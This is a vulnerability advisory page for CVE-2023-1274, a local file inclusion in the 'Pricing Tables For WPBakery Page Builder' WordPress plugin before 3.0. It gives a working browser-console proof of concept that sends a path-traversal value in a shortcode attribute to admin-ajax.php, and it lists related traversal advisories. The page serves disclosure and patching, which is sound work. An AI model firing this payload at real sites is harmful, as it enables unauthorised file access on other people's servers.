Pricing Tables For WPBakery Page Builder < 3.0 – Subscriber+ LFI | CVE 2023-1274 | Plugin Vulnerabilities

Description

The plugin does not validate some shortcode attributes before using them to generate paths passed to include function/s, allowing any authenticated users such as subscriber to perform LFI attacks

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as a subscriber user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": "action=parse-media-shortcode&shortcode=[vca_pricing_plans_child vca_pp_styles='/../../../../index']",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

pricing-tables-for-wpbakery-page-builder

Fixed in 3.0

References

CVE

Classification

Type

TRAVERSAL

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

267acb2c-1a95-487f-a714-516de05d2b2f

Timeline

Publicly Published

2023-03-22 (about 2 years ago)

Added

2023-03-22 (about 2 years ago)

Last Updated

2023-03-22 (about 2 years ago)

Other

Published

Title

Published

2023-06-22

Title

Ninja Forms < 3.6.25 - Admin+ Arbitrary File Deletion

Published

2021-07-05

Title

Haxcan <= 1.0.0 - Arbitrary File Access

Published

2022-08-09

Title

WPide < 3.0 - Admin+ Arbitrary File Read

Published

2015-07-05

Title

S3Bubble <= 0.7 - Directory Traversal leading to Arbitrary File Access

Published

2012-01-16

Title

myEASYbackup <= 1.0.8.1 - Directory Traversal